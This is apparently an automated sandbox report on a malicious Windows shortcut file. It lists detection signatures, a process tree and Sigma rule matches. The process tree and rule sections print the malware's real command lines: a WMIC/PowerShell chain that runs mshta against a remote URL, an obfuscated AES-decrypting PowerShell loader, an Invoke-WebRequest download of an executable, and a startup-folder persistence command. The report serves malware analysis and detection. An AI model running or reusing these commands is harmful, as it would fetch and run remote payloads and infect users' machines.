Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FzmtNV0vnG.lnk

Overview

General Information

Sample name:FzmtNV0vnG.lnk
renamed because original name is a hash value
Original sample name:ac9d5bb32e4d1c1cf52bf17bfdd8cf7b.lnk
Analysis ID:1579660
MD5:ac9d5bb32e4d1c1cf52bf17bfdd8cf7b
SHA1:b9c921613643e7c500783326483523e92e6ab016
SHA256:4883c36a3b5c9d4f4c318312dce1058d722e8a378adb3e348203bc93f41540d6
Tags:lnkuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Contains functionality to create processes via WMI
Creates processes via WMI
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • WMIC.exe (PID: 6648 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4180 cmdline: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3556 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/baochuan1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 1988 cmdline: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/baochuan1 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
          • powershell.exe (PID: 2608 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '5FC32DF1C0FFAB04AD1461E41B34580CF686186BB175883500353248755372D1E74F294A259C979896FEA6271F154228B3BF0D6A9D0D9F6569B9D41A9A3D09A63BCE9C837BE004A6208D93ACB87F6C547277A8C3268B742B3EF6AEA9AEAFEE59C43BF887EB0182FB5943B2947D27E46DFAAD9FE12776123E736F027853F8BC8DFCF554869724A0AA804A9049D9EA7ACBEED4C412BB6C4D4602CFC90CF615287E6C6555C8E0B6CEE3AACB66AFC773E9192903227F0CE014AE4A150CCCE925B6B22D440B7F3E392520613C07711AF2978A272709AFC70BEDE8C3201483207E66D3D483012204164092C58F5895F1B4B38C5CE831D1917AC33B6FF65EBC1F0946D72FFD582B689656A77B66A88C471D7DE4C8AAD142463BAC97A96E31AFC766F1FDD6B3267516F8027B807DBCDA9A77CC0B3EF0AFCA30DAE6A4A90E6590D26CF5960B3F113201E74E50BCC37179E67420FB07540AB18B8A281F6F6E1E0974AB449D8C5426F8776DCAD4AE3752D5ED8DD77E80E582F37E99699AC94D58A627C408F56A6BAB4FF2A4634255575F0A373CE9D4F81D7D85A6FDD69653A9ACD82342A04DE1D703FF55FD77C7093583E7A8DE7DD76FAA4FC7DC3AE525F2923AB6D03FA2CF6E1C0045EB1AE1B01FE2DCE5F0DF7AF916F7F3D8FFFCF35BA8DFEE6863AACCA2AF778D9372C039EF1AA4F66FE4C9A7B7E6B4B690EE8B5F365AFD2B94E0804532372C711FBB3284815793750781C1A32513D741D2441259E82D27F9EDAFE0F914EBC4098FCA1B2028271CE736D3BF191C47416E402EA4570B4E235E7AEE572814275E385B72FBB0EBB4E4A71440B44DF5AD9DD6C30D1FE13CF9470F4635440674E87C75280F2FD7AC139781FEE2CBD3BFB5E93BCAD4DAED74847E6BE4FD41C380DA9D3A7A21A32566CEC4C0BB9EAA0C494BAE968EB32720676452D8771B05F9FBED066BEEC71BED78275BC817D8373317584369A8DD60E296BA3A7576111EB07BB121D2FC9B92A15C9F813BAFBD25A0F89684CBA0692BCA686C8E2C8FC8B185E944941525012042EAF50007E259FC3ECD739FA2F61F6FB8325658A744B3E4DE0CED8D320510C3299CAE545C675E7E88D3B7A101C08FD1C8926471E91C6E79F62B497DD1CC8DD442A85E3C31FEB6E31E75149AA77C8D8B3DFE3CB4D3B9ED06691EE63BC9248DF964984D9E605967CD19AC1E1190D2B1FC8F1C2F12A7615AAF59A39ACFBDC1A5D1067B10A03DE63D10C8C973A264985FB7E40DC8D397B060C3C2144591271FF47D80C0C4EFD88E885F4D18CCA2CED83B8D1BD66297A6F61B3062A0F96F4B4DC0076B70FB8A8DD887142732D4A65A96B6FD7A0352D9488FAFF981B4E138BD5D5E350C18AD7F5DD70FB56686D79B20038823B95E423BC9AD64AA072C87E558C58E9D04720A12E07C3C08A91A0E105DC9FE126B797B360396173D676F52756A6E514D4757514A4D594F475365';function vxx ($xHDThLVi){return -split ($xHDThLVi -replace '..', '0x$& ')};$FMAPhot = vxx($ddg.SubString(0, 2048));$pBL = [System.Security.Cryptography.Aes]::Create();$pBL.Key = vxx($ddg.SubString(2048));$pBL.IV = New-Object byte[] 16;$KNBWNbH = $pBL.CreateDecryptor();$NjZFZrE = [System.String]::new($KNBWNbH.TransformFinalBlock($FMAPhot, 0,$FMAPhot.Length)); sal fd $NjZFZrE.Substring(3,3); fd $NjZFZrE.Substring(6) MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Acrobat.exe (PID: 6300 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Job_Description.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
              • AcroCEF.exe (PID: 2276 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
                • AcroCEF.exe (PID: 7272 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1656,i,6298120100990453940,17586476426563717861,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
            • rMpqCJnPv.exe (PID: 7952 cmdline: "C:\Users\user\AppData\Roaming\rMpqCJnPv.exe" MD5: 7E279E8E3DCD0BCD240E36D7317924D3)
              • powershell.exe (PID: 7988 cmdline: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 7728 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • Guard.exe (PID: 7680 cmdline: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685)
                  • cmd.exe (PID: 8112 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                    • conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 3176 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 7996 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SwiftWrite.pif (PID: 2792 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Execution from Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\Guard.exe, NewProcessName: C:\Users\Public\Guard.exe, OriginalFileName: C:\Users\Public\Guard.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7728, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ProcessId: 7680, ProcessName: Guard.exe
Sigma detected: Execution of Powershell Script in Public Folder
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\rMpqCJnPv.exe" , ParentImage: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe, ParentProcessId: 7952, ParentProcessName: rMpqCJnPv.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7728, ProcessName: powershell.exe
Sigma detected: Parent in Public Folder Suspicious Process
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ParentImage: C:\Users\Public\Guard.exe, ParentProcessId: 7680, ParentProcessName: Guard.exe, ProcessCommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, ProcessId: 8112, ProcessName: cmd.exe
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/baochuan1, CommandLine: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/baochuan1, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/baochuan1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3556, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/baochuan1, ProcessId: 1988, ProcessName: mshta.exe
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wscript.exe, SourceProcessId: 7996, StartAddress: 94D1BCC0, TargetImage: C:\Windows\System32\conhost.exe, TargetProcessId: 7996
Sigma detected: Script Interpreter Execution From Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\rMpqCJnPv.exe" , ParentImage: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe, ParentProcessId: 7952, ParentProcessName: rMpqCJnPv.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7728, ProcessName: powershell.exe
Sigma detected: Suspicious Invoke-WebRequest Execution
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\rMpqCJnPv.exe" , ParentImage: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe, ParentProcessId: 7952, ParentProcessName: rMpqCJnPv.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7988, ProcessName: powershell.exe
Sigma detected: Suspicious MSHTA Child Process
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '5FC32DF1C0FFAB04AD1461E41B34580CF686186BB175883500353248755372D1E74F294A259C979896FEA6271F154228B3BF0D6A9D0D9F6569B9D41A9A3D09A63BCE9C837BE004A6208D93ACB87F6C547277A8C3268B742B3EF6AEA9AEAFEE59C43BF887EB0182FB5943B2947D27E46DFAAD9FE12776123E736F027853F8BC8DFCF554869724A0AA804A9049D9EA7ACBEED4C412BB6C4D4602CFC90CF615287E6C6555C8E0B6CEE3AACB66AFC773E9192903227F0CE014AE4A150CCCE925B6B22D440B7F3E392520613C07711AF2978A272709AFC70BEDE8C3201483207E66D3D483012204164092C58F5895F1B4B38C5CE831D1917AC33B6FF65EBC1F0946D72FFD582B689656A77B66A88C471D7DE4C8AAD142463BAC97A96E31AFC766F1FDD6B3267516F8027B807DBCDA9A77CC0B3EF0AFCA30DAE6A4A90E6590D26CF5960B3F113201E74E50BCC37179E67420FB07540AB18B8A281F6F6E1E0974AB449D8C5426F8776DCAD4AE3752D5ED8DD77E80E582F37E99699AC94D58A627C408F56A6BAB4FF2A4634255575F0A373CE9D4F81D7D85A6FDD69653A9ACD82342A04DE1D703FF55FD77C7093583E7A8DE7DD76FAA4FC7DC3AE525F2923AB6D03FA2CF6E1C0045EB1AE1B01FE2DCE5F0DF7AF916F7F3D8FFFCF35BA8DFEE6863AACCA2AF778D9372C039EF1AA4F66FE4C9A7B7E6B4B690EE8B5F365AFD2B94E0804532372C711FBB3284815793750781C1A32513D741D2441259E82D27F9EDAFE0F914EBC4098FCA1B2028271CE736D3BF191C47416E402EA4570B4E235E7AEE572814275E385B72FBB0EBB4E4A71440B44DF5AD9DD6C30D1FE13CF9470F4635440674E87C75280F2FD7AC139781FEE2CBD3BFB5E93BCAD4DAED74847E6BE4FD41C380DA9D3A7A21A32566CEC4C0BB9EAA0C494BAE968EB32720676452D8771B05F9FBED066BEEC71BED78275BC817D8373317584369A8DD60E296BA3A7576111EB07BB121D2FC9B92A15C9F813BAFBD25A0F89684CBA0692BCA686C8E2C8FC8B185E944941525012042EAF50007E259FC3ECD739FA2F61F6FB8325658A744B3E4DE0CED8D320510C3299CAE545C675E7E88D3B7A101C08FD1C8926471E91C6E79F62B497DD1CC8DD442A85E3C31FEB6E31E75149AA77C8D8B3DFE3CB4D3B9ED06691EE63BC9248DF964984D9E605967CD19AC1E1190D2B1FC8F1C2F12A7615AAF59A39ACFBDC1A5D1067B10A03DE63D10C8C973A264985FB7E40DC8D397B060C3C2144591271FF47D80C0C4EFD88E885F4D18CCA2CED83B8D1BD66297A6F61B3062A0F96F4B4DC0076B70FB8A8DD887142732D4A65A96B6FD7A0352D9488FAFF981B4E138BD5D5E350C18AD7F5DD70FB56686D79B20038823B95E423BC9AD64AA072C87E558C58E9D04720A12E07C3C08A91A0E105DC9FE126B797B360396173D676F52756A6E514D4757514A4D594F475365';function vxx ($xHDThLVi){return -split ($xHDThLVi -replace '..', '0x$& ')};$FMAPhot = vxx($ddg.SubString(0, 2048));$pBL = [System.Security.Cryptography.Aes]::Create();$pBL.Key = vxx($ddg.SubString(2048));$pBL.IV = New-Object byte[] 16;$KNBWNbH = $pBL.CreateDecryptor();$NjZFZrE = [System.String]::new($KNBWNbH.TransformFinalBlock($FMAPhot, 0,$FMAPhot.Length)); sal fd $NjZFZrE.Substring(3,3); fd $NjZFZrE.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '5FC32DF1C0FFAB04AD1461E41B34580CF686186BB175883500353248755372D1E74F294A259C979896FEA6271F154228B3BF0D6A9D0D9F6569B9D41A9A3D09A63BCE9C837BE004A6208D93ACB87F6C547277A8C3268B742B3EF6AEA9AEAFEE59C43BF887EB0182FB5943B2947D27E46DFAAD9FE12776123E736F027853F8BC8DFCF554869724A0AA804A9049D
Sigma detected: Suspicious Process Created Via Wmic.EXE
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')", CommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')", ProcessId: 6648, ProcessName: WMIC.exe
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 7996, ProcessName: wscript.exe
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7988, TargetFilename: C:\Users\Public\Guard.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '5FC32DF1C0FFAB04AD1461E41B34580CF686186BB175883500353248755372D1E74F294A259C979896FEA6271F154228B3BF0D6A9D0D9F6569B9D41A9A3D09A63BCE9C837BE004A6208D93ACB87F6C547277A8C3268B742B3EF6AEA9AEAFEE59C43BF887EB0182FB5943B2947D27E46DFAAD9FE12776123E736F027853F8BC8DFCF554869724A0AA804A9049D9EA7ACBEED4C412BB6C4D4602CFC90CF615287E6C6555C8E0B6CEE3AACB66AFC773E9192903227F0CE014AE4A150CCCE925B6B22D440B7F3E392520613C07711AF2978A272709AFC70BEDE8C3201483207E66D3D483012204164092C58F5895F1B4B38C5CE831D1917AC33B6FF65EBC1F0946D72FFD582B689656A77B66A88C471D7DE4C8AAD142463BAC97A96E31AFC766F1FDD6B3267516F8027B807DBCDA9A77CC0B3EF0AFCA30DAE6A4A90E6590D26CF5960B3F113201E74E50BCC37179E67420FB07540AB18B8A281F6F6E1E0974AB449D8C5426F8776DCAD4AE3752D5ED8DD77E80E582F37E99699AC94D58A627C408F56A6BAB4FF2A4634255575F0A373CE9D4F81D7D85A6FDD69653A9ACD82342A04DE1D703FF55FD77C7093583E7A8DE7DD76FAA4FC7DC3AE525F2923AB6D03FA2CF6E1C0045EB1AE1B01FE2DCE5F0DF7AF916F7F3D8FFFCF35BA8DFEE6863AACCA2AF778D9372C039EF1AA4F66FE4C9A7B7E6B4B690EE8B5F365AFD2B94E0804532372C711FBB3284815793750781C1A32513D741D2441259E82D27F9EDAFE0F914EBC4098FCA1B2028271CE736D3BF191C47416E402EA4570B4E235E7AEE572814275E385B72FBB0EBB4E4A71440B44DF5AD9DD6C30D1FE13CF9470F4635440674E87C75280F2FD7AC139781FEE2CBD3BFB5E93BCAD4DAED74847E6BE4FD41C380DA9D3A7A21A32566CEC4C0BB9EAA0C494BAE968EB32720676452D8771B05F9FBED066BEEC71BED78275BC817D8373317584369A8DD60E296BA3A7576111EB07BB121D2FC9B92A15C9F813BAFBD25A0F89684CBA0692BCA686C8E2C8FC8B185E944941525012042EAF50007E259FC3ECD739FA2F61F6FB8325658A744B3E4DE0CED8D320510C3299CAE545C675E7E88D3B7A101C08FD1C8926471E91C6E79F62B497DD1CC8DD442A85E3C31FEB6E31E75149AA77C8D8B3DFE3CB4D3B9ED06691EE63BC9248DF964984D9E605967CD19AC1E1190D2B1FC8F1C2F12A7615AAF59A39ACFBDC1A5D1067B10A03DE63D10C8C973A264985FB7E40DC8D397B060C3C2144591271FF47D80C0C4EFD88E885F4D18CCA2CED83B8D1BD66297A6F61B3062A0F96F4B4DC0076B70FB8A8DD887142732D4A65A96B6FD7A0352D9488FAFF981B4E138BD5D5E350C18AD7F5DD70FB56686D79B20038823B95E423BC9AD64AA072C87E558C58E9D04720A12E07C3C08A91A0E105DC9FE126B797B360396173D676F52756A6E514D4757514A4D594F475365';function vxx ($xHDThLVi){return -split ($xHDThLVi -replace '..', '0x$& ')};$FMAPhot = vxx($ddg.SubString(0, 2048));$pBL = [System.Security.Cryptography.Aes]::Create();$pBL.Key = vxx($ddg.SubString(2048));$pBL.IV = New-Object byte[] 16;$KNBWNbH = $pBL.CreateDecryptor();$NjZFZrE = [System.String]::new($KNBWNbH.TransformFinalBlock($FMAPhot, 0,$FMAPhot.Length)); sal fd $NjZFZrE.Substring(3,3); fd $NjZFZrE.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '5FC32DF1C0FFAB04AD1461E41B34580CF686186BB175883500353248755372D1E74F294A259C979896FEA6271F154228B3BF0D6A9D0D9F6569B9D41A9A3D09A63BCE9C837BE004A6208D93ACB87F6C547277A8C3268B742B3EF6AEA9AEAFEE59C43BF887EB0182FB5943B2947D27E46DFAAD9FE12776123E736F027853F8BC8DFCF554869724A0AA804A9049D
Sigma detected: Execution of Suspicious File Type Extension
